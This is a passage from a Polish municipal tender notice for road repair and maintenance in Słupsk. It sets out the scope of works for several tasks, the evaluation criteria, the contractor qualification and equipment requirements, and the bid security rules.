wykonaniu robót budowlanych w obrębie pasa drogowego (w nawierzchniach: jezdni, chodników, ścieżek rowerowych, zatok i innych elementów ulic), także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym tj.:<br/>a)	frezowanie nawierzchni,<br/>b)	wykonanie robót budowlanych w zakresie układania chodników i asfaltowania,<br/>c)	wymiana nawierzchni odcinków chodników, ścieżek rowerowych, zatok i innych elementów dróg.<br/>2)	Do obowiązków Wykonawcy w zakresie ZADANIA NR 2 należy, w szczególności:<br/>a)	wykonanie robót w obrębie pasa drogowego w nawierzchniach dróg krajowych, wojewódzkich, powiatowych i gminnych zgodnie z ustalonym przez Zamawiającego zakresem, technologią i terminem,<br/>b)	frezowanie nawierzchni i mechaniczne wykonanie warstw z mieszanek mineralno-bitumicznych,<br/>c)	mechaniczne i ręczne wykonanie rozbiórki istniejącej nawierzchni chodników, ścieżek rowerowych, zatok i innych elementów drogi oraz ponowne wykonanie nawierzchni z materiałów uzgodnionych z Zamawiającym,<br/>d)	zabezpieczenie prowadzonych robót zgodnie z przepisami o ruchu drogowym,<br/>e)	informowanie Zamawiającego o konieczności zorganizowania ruchu zastępczego na czas prowadzenia robót oraz przygotowanie tymczasowej organizacji ruchu i wykonanie związanego z tym oznakowania,<br/>f)	powiadomienie Zamawiającego (e-mailem) przed przystąpieniem do robót o terminie, lokalizacji i zakresie robót wraz z podaniem sposobu oznakowania robót,<br/>g)	oczyszczenie i przewiezienie, zważonego lub zliczonego pełnowartościowego materiału z rozbiórki oraz materiału pofrezowego we wskazane miejsce w obrębie do 10 km; koszt ważenia materiałów rozbiórkowych ponosi Wykonawca,<br/>h)	skompletowanie oraz przedstawienie dokumentów pozwalających na ocenę prawidłowego wykonania przedmiotu zamówienia,<br/>i)	zorganizowanie i prowadzenie zleconych robót z należytą starannością z zachowaniem procesu technologicznego,<br/>j)	wykonanie robót budowlanych w obrębie pasa drogowego od dnia zgłoszenia (w formie: e- maila lub rozmowy telefonicznej), nie później niż w ciągu 2 dni od dnia zgłoszenia lub zgodnie z ustalonym przez Zamawiającego terminem,<br/>k)	prowadzenie na bieżąco książki obmiarów i dokumentów rozliczeniowych i przedłożenie Zamawiającemu nie później niż 5 dni od daty zakończenia robót,<br/>l)	Wykonawca winien zapewnić kontrolę jakości robót materiałów oraz przekazać Zamawiającemu deklaracje zgodności na materiały i prefabrykaty przed ich wbudowaniem. Badania materiałów (atesty, aprobaty itp.) Wykonawca powinien przekazać przy robotach zanikających oraz przy odbiorze całości zleconych robót.<br/>2. Roboty należy prowadzić bez zamykania całej szerokości jezdni, przy zachowaniu ruchu na drogach.<br/>3. Realizacja przedmiotu zamówienia, będzie odbywała się na podstawie zleceń udzielanych przez Zamawiającego. Wielkość i rodzaj wykonywanych robót będzie ustalana przez Zamawiającego z każdorazowym określeniem zakresu robót wynikającego z aktualnych potrzeb. Nie dotyczy to sytuacji wynikających z zaistniałych awarii, gdzie zakres robót będzie ustalany na bieżąco.<br/>4. Wykonawca ma obowiązek zapewnić bezpośrednią całodobową łączność telefoniczną.<br/>5. Wykonawca zobowiązany jest do zapewnienia całodobowej dyspozycyjności na cały okres realizacji zamówienia.<br/>6. Wykonawca obowiązany jest wykonać roboty zgodnie z zasadami wiedzy i sztuki budowlanej oraz w oparciu o Ogólne Specyfikacje Techniczne opracowane przez Generalną Dyrekcję Dróg Krajowych i Autostrad w Warszawie wymieniowe w rozdziale IV pkt 6 ppkt 5 SWZ.<br/>7. Zamawiający wymaga od Wykonawcy udzielenia gwarancji i rękojmi na wykonane roboty budowlane na okres nie krótszy niż ZADANIE NR 2 – 12 miesięcy, licząc od dnia odbioru robót (zlecenia).<br/>8. Wykonawca musi posiadać polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej za szkody wyrządzone w związku z realizacją przedmiotu zamówienia w każdym roku obowiązywania umowy na kwotę nie mniejszą niż: ZADANIE NR 1: 70 000,00 zł na jedno i wszystkie zdarzenia w okresie ubezpieczenia.<br/>9. Szczegółowy opis i warunki realizacji przedmiotu zamówienia dla ZADANIA NR 2 wskazano w SWZ i projekcie umowy stanowiącym załączniki nr 9B do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w ramach realizacji przedmiotu zamówienia przewiduje możliwość zastosowania prawa OPCJI, o którym mowa w art. 441 ustawy Pzp. <br/>2.	PRAWO OPCJI – warunki i zasady skorzystania z prawa opcji;<br/>a)	Przedmiot zamówienia ZADANIA NR 2 obejmuje roboty z podziałem na zakres PODSTAWOWY i prawo OPCJI, których opis i ilości zostały określone w Formularzu cenowym/kosztorysie ofertowym stanowiącym załącznik nr 1B do SWZ.<br/>b)	Zamawiający ma prawo jednostronnie rozszerzyć przedmiot zamówienia (prawo opcji).<br/>c)	Zamawiający zastrzega, że zakres opcjonalny zamówienia nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy, przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji.<br/>d)	Skorzystanie z prawa opcji może nastąpić raz lub więcej razy w okresie realizacji zamówienia i uzależnione będzie wyłącznie od potrzeb Zamawiającego i możliwości finansowych Zamawiającego. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia.<br/>e)	Wszystkie wymagania i zasady realizacji przedmiotu zamówienia ZADANIA NR 2 w zakresie zamówienia podstawowego dotyczą także realizacji zamówienia w ramach prawa opcji.<br/>f)	Zakres czynności określony w ZADANIU NR 2 w ramach prawa OPCJI dotyczy czynności wykonywanych w ramach zamówienia podstawowego, o których mowa w rozdz. IV SWZ pkt 6 ppkt 6 lit. f i w Formularzu cenowym/kosztorysie ofertowym - zał. nr 1A do SWZ.<br/>3. Warunki realizacji przedmiotu zamówienia w ramach prawa OPCJI wskazano w SWZ i projekcie umowy stanowiącym załączniki nr 9B do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według kryteriów opisanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Opis przedmiotu zamówienia w zakresie ZADANIA NR 3 – „Naprawa dróg o nawierzchniach nieulepszonych”:<br/>1)	Do nawierzchni nieulepszonych zalicza się nawierzchnie:<br/>a)	gruntowe,<br/>b)	żużlowe,<br/>c)	tłuczniowe,<br/>d)	z płyt żelbetowych pełnych i ażurowych.<br/>2)	Zakres robót w ramach ZADANIA NR 3:<br/>a)	wykonanie nawierzchni tymczasowych z:<br/>	tłucznia betonowego,<br/>	płyt betonowych lub żelbetowych,<br/>	z destruktu asfaltowego,<br/>b)	wykonanie robót polegających na profilowaniu i wyrównywaniu dróg o nawierzchniach nieulepszonych oraz podejmowaniu innych działań technicznych mających na celu zapewnienie właściwego stanu technicznego drogi oraz sprawności i bezpieczeństwa ruchu drogowego niezależnie od warunków atmosferycznych.<br/>3)	Do obowiązków Wykonawcy w zakresie ZADANIA NR 3 należy w szczególności:<br/>a)	ręczne i mechaniczne wyrównanie nawierzchni gruntowych, żużlowych, z destruktu asfaltowego oraz z gruzu betonowego,<br/>b)	uzupełnienie gruntem, żużlem, destruktem asfaltowym, tłuczniem betonowym ubytków w nawierzchni lub miejsc zagrażających bezpieczeństwu ruchu drogowego,<br/>c)	ścinanie zawyżonych poboczy wraz z transportem nadmiaru gruntu,<br/>d)	mechaniczne zagęszczenie nawierzchni,<br/>e)	utrzymanie normatywnej głębokości rowów przydrożnych oraz normatywnego spadku skarp,<br/>f)	wykonywanie nawierzchni z destruktu asfaltowego,<br/>g)	wykonywanie nawierzchni z tłucznia betonowego,<br/>h)	wykonywanie nawierzchni z płyt żelbetowych ażurowych oraz płyt żelbetowych drogowych pełnych,<br/>i)	utrzymanie nawierzchni w stanie przejezdności,<br/>j)	monitorowanie na bieżąco stanu nawierzchni dróg,<br/>k)	bieżące zgłaszanie Zamawiającemu potrzeb napraw nawierzchni,<br/>l)	wykonywanie poleceń Zamawiającego w zakresie utrzymania nawierzchni,<br/>m)	przekazywanie informacji w zakresie awarii urządzeń podziemnych i naziemnych,<br/>n)	wykonanie robót w zakresie naprawy w nawierzchniach dróg nie później niż w ciągu 2 dni od dnia zgłoszenia lub zgodnie z ustalonym przez Zamawiającego terminem (w formie: e-maila lub rozmowy telefonicznej),<br/>o)	w przypadku zgłoszonych awarii należy zabezpieczyć i oznakować te miejsca niezwłocznie po otrzymaniu informacji (w formie elektronicznej lub rozmowy telefonicznej), nie później niż w ciągu 1 godziny,<br/>p)	zabezpieczenie prowadzonych robót zgodnie z przepisami o ruchu drogowym,<br/>q)	informowanie Zamawiającego o konieczności zorganizowania ruchu zastępczego na czas prowadzenia robót oraz przygotowanie tymczasowej organizacji ruchu i związane z tym oznakowanie.<br/>2. Roboty należy prowadzić bez zamykania całej szerokości jezdni, przy zachowaniu ruchu na drogach.<br/>3. Wykonawca obowiązany jest wykonać roboty zgodnie z zasadami wiedzy i sztuki budowlanej oraz w oparciu o Ogólne Specyfikacje Techniczne opracowane przez Generalną Dyrekcję Dróg Krajowych i Autostrad w Warszawie wymieniowe w rozdziale IV pkt 7 ppkt 6 SWZ.<br/>4. Realizacja przedmiotu zamówienia, będzie odbywała się na podstawie zleceń udzielanych przez Zamawiającego. Wielkość i rodzaj wykonywanych robót będzie ustalana przez Zamawiającego z każdorazowym określeniem zakresu robót wynikającego z aktualnych potrzeb. Nie dotyczy to sytuacji wynikających z zaistniałych awarii, gdzie zakres robót będzie ustalany na bieżąco.<br/>5. Wykonawca ma obowiązek zapewnić bezpośrednią całodobową łączność telefoniczną.<br/>6. Wykonawca zobowiązany jest do zapewnienia całodobowej dyspozycyjności na cały okres realizacji zamówienia.<br/>7. Zamawiający wymaga od Wykonawcy udzielenia gwarancji i rękojmi na wykonane roboty budowlane na okres nie krótszy niż ZADANIE NR 3 – 3 miesiące, licząc od dnia odbioru robót (zlecenia).<br/>8. Wykonawca musi posiadać polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej za szkody wyrządzone w związku z realizacją przedmiotu zamówienia w każdym roku obowiązywania umowy na kwotę nie mniejszą niż: ZADANIE NR 3: 200 000,00 zł na jedno i wszystkie zdarzenia w okresie ubezpieczenia.<br/>9. Szczegółowy opis i warunki realizacji przedmiotu zamówienia dla ZADANIA NR 3 wskazano w SWZ i projekcie umowy stanowiącym załączniki nr 9C do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w ramach realizacji przedmiotu zamówienia przewiduje możliwość zastosowania prawa OPCJI, o którym mowa w art. 441 ustawy Pzp. <br/>2.	PRAWO OPCJI – warunki i zasady skorzystania z prawa opcji;<br/>a)	Przedmiot zamówienia ZADANIA NR 3 obejmuje roboty z podziałem na zakres PODSTAWOWY i prawo OPCJI, których opis i ilości zostały określone w Formularzu cenowym/kosztorysie ofertowym stanowiącym załącznik nr 1C do SWZ.<br/>b)	Zamawiający ma prawo jednostronnie rozszerzyć przedmiot zamówienia (prawo opcji).<br/>c)	Zamawiający zastrzega, że zakres opcjonalny zamówienia nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy, przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji.<br/>d)	Skorzystanie z prawa opcji może nastąpić raz lub więcej razy w okresie realizacji zamówienia i uzależnione będzie wyłącznie od potrzeb Zamawiającego i możliwości finansowych Zamawiającego. W przypadku nie skorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia.<br/>e)	Wszystkie wymagania i zasady realizacji przedmiotu zamówienia ZADANIA NR 3 w zakresie zamówienia podstawowego dotyczą także realizacji zamówienia w ramach prawa opcji.<br/>f)	Zakres czynności określony w ZADANIU NR 3 w ramach prawa OPCJI dotyczy czynności wykonywanych w ramach zamówienia podstawowego, o których mowa w rozdz. IV SWZ pkt 7 ppkt 7 lit. f i w Formularzu cenowym/kosztorysie ofertowym - zał. nr 1C do SWZ.<br/>3. Warunki realizacji przedmiotu zamówienia w ramach prawa OPCJI wskazano w SWZ i projekcie umowy stanowiącym załączniki nr 9C do SWZ. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według kryteriów opisanych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	w zakresie ZADANIA NR 1 – „Naprawa dróg o nawierzchniach ulepszonych”:<br/>	wykonał w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwie (2) roboty budowlane polegające na bieżącej naprawie dróg o nawierzchniach ulepszonych (z kostki kamiennej lub betonowej lub klinkierowej lub nawierzchni betonowej lub nawierzchni mineralno-bitumicznych),<br/>	skieruje do realizacji zamówienia jedną (1) osobę pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>	dysponuje co najmniej następującym potencjałem technicznym:<br/>	lekkim walcem wibracyjnym – szt. 2,<br/>	zagęszczarką płytową – szt. 1,<br/>	ciągnikiem kołowym – szt. 1,<br/>	samochodem samowyładowczym do 5 t – szt. 1,<br/>	piłą do asfaltu – szt. 1,<br/>	przecinarką do betonów – szt. 1,<br/>	recyklerem o pojemności kotła nie mniej niż 1 tona – szt. 3,<br/>	zalewarką do asfaltów – szt. 1,<br/>	termosem do przewozu masy – szt. 1.<br/>b)	w zakresie ZADANIA NR 2 – „Wykonanie robót budowlanych w obrębie pasa drogowego”:<br/>	wykonał w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jedną (1) robotę budowlaną w obrębie pasa drogowego polegającą na remoncie, przebudowie lub budowie drogi, chodników, ścieżek rowerowych, zatok lub innych elementów ulic o nawierzchni mineralno-bitumicznej i co najmniej jedną (1) robotę budowlaną w obrębie pasa drogowego polegającą na remoncie, przebudowie lub budowie drogi, chodników, ścieżek rowerowych, zatok lub innych elementów ulic o nawierzchni z kostki kamiennej lub betonowej lub klinkierowej,<br/>	skieruje do realizacji zamówienia jedną (1) osobę pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>	dysponuje co najmniej następującym potencjałem technicznym:<br/>	układarką mas bitumicznych – szt. 1,<br/>	walcem statycznym samojezdnym – szt. 2,<br/>	lekkim walcem wibracyjnym – szt. 2,<br/>	zagęszczarką płytową – szt. 2,<br/>	skrapiarką do bitumu – szt. 1,<br/>	frezarką – szt. 1,<br/>	koparka do robót ziemnych – szt. 1,<br/>	sprężarką powietrza (przewoźna, spalinowa) – szt. 1,<br/>	samochodem samowyładowczym do 5 t – szt. 1,<br/>	samochodem samowyładowczym 10 - 15 t – szt. 1,<br/>	piłą do asfaltu – szt. 1,<br/>	przecinarką do betonów – szt. 1,<br/>	dźwigiem samojezdnym – szt. 1,<br/>	ciągnikiem kołowym – szt. 1.<br/>c)	w zakresie ZADANIA NR 3 – „Naprawa dróg o nawierzchniach nieulepszonych”:<br/>	wykonał w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwie (2) roboty budowlane polegające na bieżącej naprawie dróg o nawierzchniach z materiałów nieulepszonych (gruntowych, żużlowych, z tłucznia oraz destruktu asfaltowego) oraz co najmniej jednej (1) roboty polegającej na ułożeniu drogi tymczasowej o nawierzchni z tłucznia betonowego lub płyt żelbetowych,<br/>	skieruje do realizacji zamówienia jedną (1) osobę pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami w specjalności drogowej lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>	dysponuje co najmniej następującym potencjałem technicznym:<br/>	ciągnikiem z przyczepą – szt. 1,<br/>	samochodem samowyładowczym – szt. 1,<br/>	równiarką – szt. 1,<br/>	koparko-spycharką – szt. 1,<br/>	walcem ogumionym – szt. 1.<br/>3.	Jeżeli Wykonawca składa ofertę na więcej niż jedno ZADANIE, to Zamawiający dopuszcza spełnienie warunku udziału w postępowaniu przez tę sama osobę w każdym ZADANIU. <br/>4.	Zamawiający wymaga, aby Wykonawca dysponował ww. kadrą techniczną przez cały okres realizacji przedmiotu zamówienia (dotyczy każdego ZADANIA).<br/>5.	Przez uprawnienia budowlane Zamawiający rozumie uprawnienia wydane zgodnie z ustawą z dnia 07.07.1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a i innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Stosownie do art. 12 ust. 7 ustawy – Prawo budowlane, podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi m.in. wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę Izbę. Zgodnie z art. 12a ustawy - Prawo budowlane, samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>6.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>7.	Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>8.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>9.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w pkt 2 ppkt 4 - zgodnie z załącznikiem nr 4 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składnia ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 6 do SWZ,<br/>2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 7 do SWZ,<br/>3. Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami – załącznik nr 8 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>1)	ZADANIE NR 1 – 100 000,00 zł (słownie: sto tysięcy złotych 00/100),<br/>2)	ZADANIE NR 2 – 3 000,00 zł (słownie: trzy tysiące złotych 00/100),<br/>3)	ZADANIE NR 3 – 9 000,00 zł (słownie: dziewięć tysięcy złotych 00/100).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: 39 1140 1153 0000 2179 2400 1003 z dopiskiem &#34;Wadium – Naprawy i remonty dróg. ZADANIE NR ________”. <br/>UWAGA: Za termin wniesienia wadium w formie pieniądza zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie gwarancji lub poręczeń musi być złożone jako oryginał gwarancji lub poręczenia, w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp,<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer referencyjny przedmiotowego postępowania,<br/>6)	beneficjentem poręczenia lub gwarancji jest: Zarząd Infrastruktury Miejskiej w Słupsku, ul. Artura Grottgera 13, 76-200 Słupsk, który działa w imieniu i na rzecz Miasta Słupsk, Plac Zwycięstwa 3, 76-200 Słupsk,<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>6.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania 